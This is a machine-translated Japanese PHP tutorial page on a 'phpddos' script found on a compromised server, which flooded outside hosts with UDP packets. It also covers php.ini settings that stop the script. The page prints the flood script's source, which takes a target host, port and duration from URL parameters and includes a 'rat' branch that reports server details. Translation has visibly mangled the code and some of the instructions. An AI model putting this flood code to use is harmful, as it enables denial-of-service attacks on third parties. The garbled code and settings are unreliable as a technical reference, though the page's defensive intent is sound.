検索

ホームページ >バックエンド開発 >PHPチュートリアル >phpddos 攻撃 (サーバーが外部ネットワークに大量のデータ パケットを送信する) の解決策_PHP チュートリアル

phpddos 攻撃 (サーバーが外部ネットワークに大量のデータ パケットを送信する) の解決策_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-20 11:10:291406ブラウズ

今日、私のマシンの 1 台が突然、1 秒あたり 1G を超える大量のデータ パケットを外部に送信しました。UDP パケットを禁止するポリシーを使用していたため、送信できませんでしたが、大量のデータ パケットが送信されました。お金が足りないので、ついに解決する方法を見つけました。

まずソースコードを見てください

外部にリクエストするためにfsockopenを使用しているので、彼にリクエストさせないでくださいそれを設定してくださいphp.ini
コードは次のとおりです コードをコピーしてください

set_time_limit(999999);
$host = $_GET['host'];
$ port = $_GET['port '];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)= =0 または StrLen($port ) == 0 または Strlen ($ exec_time) == 0) {
if (
_ Get ['Rat']) & lt; gt; {

echo $ _get ['ネズミ']. "]."|".GetHostByName($_SERVER


['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat' ]; exit}

$ max_time = time()+$ exec_time; ( "udp:// $ host"、$ port、$ errno、$ errstr、5); /1024=" .round($Sendlen/1024, 2) . ")kb / 1024 = " .

round($packets*$Sendlen/1024/1024, 2) . " mb

" ;

echo "送信レート:" .round($packets/$exec_time, 2) .round($packets/


$Sendlen/1024/1024, 2) . s";
?>


キーコードは



コードは次のとおりです

コードをコピーしてください


$fp = fsockopen("udp://$ip", $rand , $errno, $errstr, 5);



方法は非常に簡単で、UDP パケットをターゲット ホストに送信し、上記の無限ループの定義により、より大きな圧力が発生します。

このスクリプトを実行するサーバーは最初に独自のネットワーク帯域幅、CPU、その他のリソースを大量に消費するため、この負荷がかかります。

このスクリプトを使用してターゲットサイトに圧力をかけたい場合は、複数のサーバー、DDOSでスクリプトを実行する必要があります

コードは次のとおりですallow_url_fopen = Offそうであれば、パッケージを送信できます
コードをコピー



コードは次のとおりです

コピーコード

拡張子 =php_sockets.dllに変更されました

APACHE、IIS、NGINX を再起動します
これにより、PHP DDOS がパッケージを送信できなくなります

さらに、一部のネチズンは次のように述べています

タイムアウトなしに設定されるスクリプトを無効にするのは非常に簡単です。1. set_time_limit 関数を無効にします。2. PHP のセーフ モード (safe_mode=on) を有効にします

ソケット関数を無効にすると、すべてのソケット モジュールを直接無効にするか、fsockopen 関数を無効にできます

ソケットはパスワードを取得するためのメール送信によく使用されるため、有効にすることをお勧めします。セーフ モードを直接実行しますが、

この場合、スクリプトは 30 秒ごとにタイムアウトします。30 秒ごとにクリックして DDOS を起動するほど孤独な「ハッカー」はいないと推定されます。 。 。

経験: この種の問題は通常、Web サイトのセキュリティとサーバーのセキュリティに注意を払う必要があります。macofee の使用方法を知っていれば、簡単に侵入されないようにする必要があります。ウェブサイトを制限した方が良いでしょう。

;拡張子= php_sockets.dll

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/444720.html技術記事今日、私のマシンの 1 台が突然、1 秒あたり 1G を超える可能性のある大量のデータ パケットを外部に送信しました。UDP パケットの送信を禁止するポリシーを使用しましたが、多額の費用がかかりました。結局、私はまだ考えていました...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:PHP は JSON データを使用してクロスドメイン操作を実装します。 Examples_PHP チュートリアル次の記事:PHP は JSON データを使用してクロスドメイン操作を実装します。 Examples_PHP チュートリアル

関連記事

続きを見る